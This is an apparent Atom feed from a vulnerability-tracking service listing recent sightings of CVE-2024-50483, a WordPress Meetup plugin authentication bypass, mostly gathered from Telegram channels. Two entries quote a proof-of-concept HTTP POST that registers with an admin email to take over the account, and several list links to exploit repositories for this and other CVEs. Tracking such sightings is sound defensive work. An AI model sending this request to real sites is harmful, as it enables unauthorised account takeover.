<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://db.gcve.eu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-05-22T14:30:44.618146+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@gcve.eu</email>
  </author>
  <link href="https://db.gcve.eu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent sightings.</subtitle>
  <entry>
    <id>https://db.gcve.eu/sighting/df0c6249-1103-4eef-a133-ee497de89977/export</id>
    <title>df0c6249-1103-4eef-a133-ee497de89977</title>
    <updated>2026-05-22T14:30:44.917806+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "df0c6249-1103-4eef-a133-ee497de89977", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/17", "content": "CVE-2024-50483\n\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: kubernetes.docker.internal\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 149\n\naction=meetup_fb_register&amp;amp;email=admin@admin.com&amp;amp;first_name=Test&amp;amp;last_name=User&amp;amp;id=12345678901234567890&amp;amp;type=token&amp;amp;link=https://example.com/user/test/\n\n#exploit #poc", "creation_timestamp": "2024-11-11T17:23:26.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/df0c6249-1103-4eef-a133-ee497de89977/export"/>
    <published>2024-11-11T17:23:26+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/6e7de90e-5f8f-40d3-9b61-0367ce34c66c/export</id>
    <title>6e7de90e-5f8f-40d3-9b61-0367ce34c66c</title>
    <updated>2026-05-22T14:30:44.917725+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "6e7de90e-5f8f-40d3-9b61-0367ce34c66c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "published-proof-of-concept", "source": "https://t.me/haj3imad/20589", "content": "CVE-2024-50483\n\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: kubernetes.docker.internal\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 149\n\naction=meetup_fb_register&amp;amp;email=admin@admin.com&amp;amp;first_name=Test&amp;amp;last_name=User&amp;amp;id=12345678901234567890&amp;amp;type=token&amp;amp;link=https://example.com/user/test/\n\n#exploit #poc", "creation_timestamp": "2024-11-11T17:23:52.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/6e7de90e-5f8f-40d3-9b61-0367ce34c66c/export"/>
    <published>2024-11-11T17:23:52+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/5887977f-66c2-4810-a176-10c967c3adbf/export</id>
    <title>5887977f-66c2-4810-a176-10c967c3adbf</title>
    <updated>2026-05-22T14:30:44.917648+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "5887977f-66c2-4810-a176-10c967c3adbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3445", "content": "https://github.com/RandomRobbieBF/CVE-2024-50483\n\nMeetup &amp;lt;= 0.1 - Authentication Bypass via Account Takeover\n#github #exploit #poc", "creation_timestamp": "2024-11-12T15:27:07.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/5887977f-66c2-4810-a176-10c967c3adbf/export"/>
    <published>2024-11-12T15:27:07+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/93546269-d6f9-4cf7-acec-9093cc1d7c01/export</id>
    <title>93546269-d6f9-4cf7-acec-9093cc1d7c01</title>
    <updated>2026-05-22T14:30:44.917564+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "93546269-d6f9-4cf7-acec-9093cc1d7c01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "seen", "source": "https://t.me/CyberDilara/1286", "content": "Tools - Hackers Factory \n\n#Purple_Team_Exercises\n\nPurple Team Exercise Framework (PTEF)\n\nhttps://github.com/scythe-io/purple-team-exercise-framework\n\nA new sandbox escape vulnerabilities at #POC2024\n \nblog post: https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/\n\nSlides:\nhttps://github.com/jhftss/jhftss.github.io/blob/main/res/slides/A%20New%20Era%20of%20macOS%20Sandbox%20Escapes.pdf\n\n#exploit\n\n1. CVE-2024-49681:\nWP Sessions Time Monitoring Full Automatic &amp;lt;=1.0.9 - Unauthenticated SQLI\n\nhttps://github.com/RandomRobbieBF/CVE-2024-49681\n\n2. CVE-2024-10914:\nD-Link NAS Command Injection\n\nhttps://github.com/imnotcha0s/CVE-2024-10914\n\n3. CVE-2024-50483:\nWP Meetup 0.1 Authentication Bypass\n\nA web application that assists network defenders, analysts, and researchers in the process of mapping adversary behaviors to the MITRE ATT&amp;amp;CK\u00ae framework.\n\nhttps://github.com/cisagov/decider\n\n#HackersFactory", "creation_timestamp": "2024-12-08T03:36:04.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/93546269-d6f9-4cf7-acec-9093cc1d7c01/export"/>
    <published>2024-12-08T03:36:04+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/96f7387f-4b1c-4b39-a160-aeed0373b002/export</id>
    <title>96f7387f-4b1c-4b39-a160-aeed0373b002</title>
    <updated>2026-05-22T14:30:44.917481+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "96f7387f-4b1c-4b39-a160-aeed0373b002", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "seen", "source": "https://t.me/dilagrafie/3963", "content": "Tools - Hackers Factory \n\n#Purple_Team_Exercises\n\nPurple Team Exercise Framework (PTEF)\n\nhttps://github.com/scythe-io/purple-team-exercise-framework\n\nA new sandbox escape vulnerabilities at #POC2024\n \nblog post: https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/\n\nSlides:\nhttps://github.com/jhftss/jhftss.github.io/blob/main/res/slides/A%20New%20Era%20of%20macOS%20Sandbox%20Escapes.pdf\n\n#exploit\n\n1. CVE-2024-49681:\nWP Sessions Time Monitoring Full Automatic &amp;lt;=1.0.9 - Unauthenticated SQLI\n\nhttps://github.com/RandomRobbieBF/CVE-2024-49681\n\n2. CVE-2024-10914:\nD-Link NAS Command Injection\n\nhttps://github.com/imnotcha0s/CVE-2024-10914\n\n3. CVE-2024-50483:\nWP Meetup 0.1 Authentication Bypass\n\nA web application that assists network defenders, analysts, and researchers in the process of mapping adversary behaviors to the MITRE ATT&amp;amp;CK\u00ae framework.\n\nhttps://github.com/cisagov/decider\n\n#HackersFactory", "creation_timestamp": "2024-12-08T03:37:01.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/96f7387f-4b1c-4b39-a160-aeed0373b002/export"/>
    <published>2024-12-08T03:37:01+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/747cc8f8-e17f-4653-b007-88905d23e977/export</id>
    <title>747cc8f8-e17f-4653-b007-88905d23e977</title>
    <updated>2026-05-22T14:30:44.917395+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "747cc8f8-e17f-4653-b007-88905d23e977", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "seen", "source": "https://t.me/GrayHatsHack/9111", "content": "Tools - Hackers Factory \n\n#Purple_Team_Exercises\n\nPurple Team Exercise Framework (PTEF)\n\nhttps://github.com/scythe-io/purple-team-exercise-framework\n\nA new sandbox escape vulnerabilities at #POC2024\n \nblog post: https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/\n\nSlides:\nhttps://github.com/jhftss/jhftss.github.io/blob/main/res/slides/A%20New%20Era%20of%20macOS%20Sandbox%20Escapes.pdf\n\n#exploit\n\n1. CVE-2024-49681:\nWP Sessions Time Monitoring Full Automatic &amp;lt;=1.0.9 - Unauthenticated SQLI\n\nhttps://github.com/RandomRobbieBF/CVE-2024-49681\n\n2. CVE-2024-10914:\nD-Link NAS Command Injection\n\nhttps://github.com/imnotcha0s/CVE-2024-10914\n\n3. CVE-2024-50483:\nWP Meetup 0.1 Authentication Bypass\n\nA web application that assists network defenders, analysts, and researchers in the process of mapping adversary behaviors to the MITRE ATT&amp;amp;CK\u00ae framework.\n\nhttps://github.com/cisagov/decider\n\n#HackersFactory", "creation_timestamp": "2024-12-08T03:49:57.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/747cc8f8-e17f-4653-b007-88905d23e977/export"/>
    <published>2024-12-08T03:49:57+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/c72707cb-12c8-4921-ad71-f03c1609cc71/export</id>
    <title>c72707cb-12c8-4921-ad71-f03c1609cc71</title>
    <updated>2026-05-22T14:30:44.917305+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "c72707cb-12c8-4921-ad71-f03c1609cc71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "seen", "source": "https://t.me/GrayHatsHack/7705", "content": "Tools - Hackers Factory \n\n#Purple_Team_Exercises\n\nPurple Team Exercise Framework (PTEF)\n\nhttps://github.com/scythe-io/purple-team-exercise-framework\n\nA new sandbox escape vulnerabilities at #POC2024\n \nblog post: https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/\n\nSlides:\nhttps://github.com/jhftss/jhftss.github.io/blob/main/res/slides/A%20New%20Era%20of%20macOS%20Sandbox%20Escapes.pdf\n\n#exploit\n\n1. CVE-2024-49681:\nWP Sessions Time Monitoring Full Automatic &amp;lt;=1.0.9 - Unauthenticated SQLI\n\nhttps://github.com/RandomRobbieBF/CVE-2024-49681\n\n2. CVE-2024-10914:\nD-Link NAS Command Injection\n\nhttps://github.com/imnotcha0s/CVE-2024-10914\n\n3. CVE-2024-50483:\nWP Meetup 0.1 Authentication Bypass\n\nA web application that assists network defenders, analysts, and researchers in the process of mapping adversary behaviors to the MITRE ATT&amp;amp;CK\u00ae framework.\n\nhttps://github.com/cisagov/decider\n\n#HackersFactory", "creation_timestamp": "2024-12-08T03:49:57.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/c72707cb-12c8-4921-ad71-f03c1609cc71/export"/>
    <published>2024-12-08T03:49:57+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/aa1983b1-3966-469c-b0e1-9098db690669/export</id>
    <title>aa1983b1-3966-469c-b0e1-9098db690669</title>
    <updated>2026-05-22T14:30:44.917207+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "aa1983b1-3966-469c-b0e1-9098db690669", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "seen", "source": "https://t.me/GrayHatsHack/9113", "content": "Tools - Hackers Factory \n\n#Purple_Team_Exercises\n\nPurple Team Exercise Framework (PTEF)\n\nhttps://github.com/scythe-io/purple-team-exercise-framework\n\nA new sandbox escape vulnerabilities at #POC2024\n \nblog post: https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/\n\nSlides:\nhttps://github.com/jhftss/jhftss.github.io/blob/main/res/slides/A%20New%20Era%20of%20macOS%20Sandbox%20Escapes.pdf\n\n#exploit\n\n1. CVE-2024-49681:\nWP Sessions Time Monitoring Full Automatic &amp;lt;=1.0.9 - Unauthenticated SQLI\n\nhttps://github.com/RandomRobbieBF/CVE-2024-49681\n\n2. CVE-2024-10914:\nD-Link NAS Command Injection\n\nhttps://github.com/imnotcha0s/CVE-2024-10914\n\n3. CVE-2024-50483:\nWP Meetup 0.1 Authentication Bypass\n\nA web application that assists network defenders, analysts, and researchers in the process of mapping adversary behaviors to the MITRE ATT&amp;amp;CK\u00ae framework.\n\nhttps://github.com/cisagov/decider\n\n#HackersFactory", "creation_timestamp": "2024-12-10T04:28:56.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/aa1983b1-3966-469c-b0e1-9098db690669/export"/>
    <published>2024-12-10T04:28:56+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/a971fcfd-f69a-4b81-a80e-3ec1fe019cd6/export</id>
    <title>a971fcfd-f69a-4b81-a80e-3ec1fe019cd6</title>
    <updated>2026-05-22T14:30:44.917061+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "a971fcfd-f69a-4b81-a80e-3ec1fe019cd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "seen", "source": "https://t.me/GrayHatsHack/7706", "content": "Tools - Hackers Factory \n\n#Purple_Team_Exercises\n\nPurple Team Exercise Framework (PTEF)\n\nhttps://github.com/scythe-io/purple-team-exercise-framework\n\nA new sandbox escape vulnerabilities at #POC2024\n \nblog post: https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/\n\nSlides:\nhttps://github.com/jhftss/jhftss.github.io/blob/main/res/slides/A%20New%20Era%20of%20macOS%20Sandbox%20Escapes.pdf\n\n#exploit\n\n1. CVE-2024-49681:\nWP Sessions Time Monitoring Full Automatic &amp;lt;=1.0.9 - Unauthenticated SQLI\n\nhttps://github.com/RandomRobbieBF/CVE-2024-49681\n\n2. CVE-2024-10914:\nD-Link NAS Command Injection\n\nhttps://github.com/imnotcha0s/CVE-2024-10914\n\n3. CVE-2024-50483:\nWP Meetup 0.1 Authentication Bypass\n\nA web application that assists network defenders, analysts, and researchers in the process of mapping adversary behaviors to the MITRE ATT&amp;amp;CK\u00ae framework.\n\nhttps://github.com/cisagov/decider\n\n#HackersFactory", "creation_timestamp": "2024-12-10T04:28:56.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/a971fcfd-f69a-4b81-a80e-3ec1fe019cd6/export"/>
    <published>2024-12-10T04:28:56+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/1e6e73eb-2197-4816-9f03-fedb3fada435/export</id>
    <title>1e6e73eb-2197-4816-9f03-fedb3fada435</title>
    <updated>2026-05-22T14:30:44.914517+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "1e6e73eb-2197-4816-9f03-fedb3fada435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-50483", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11414", "content": "#exploit\n1. CVE-2024-49681:\nWP Sessions Time Monitoring Full Automatic &amp;lt;=1.0.9 - Unauthenticated SQLI\nhttps://github.com/RandomRobbieBF/CVE-2024-49681\n\n2. CVE-2024-10914:\nD-Link NAS Command Injection\nhttps://github.com/imnotcha0s/CVE-2024-10914\n]-&amp;gt; Exploitation + Fix\n\n3. CVE-2024-50483:\nWP Meetup 0.1 Authentication Bypass\nhttps://github.com/RandomRobbieBF/CVE-2024-50483", "creation_timestamp": "2025-01-15T00:36:56.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/1e6e73eb-2197-4816-9f03-fedb3fada435/export"/>
    <published>2025-01-15T00:36:56+00:00</published>
  </entry>
</feed>
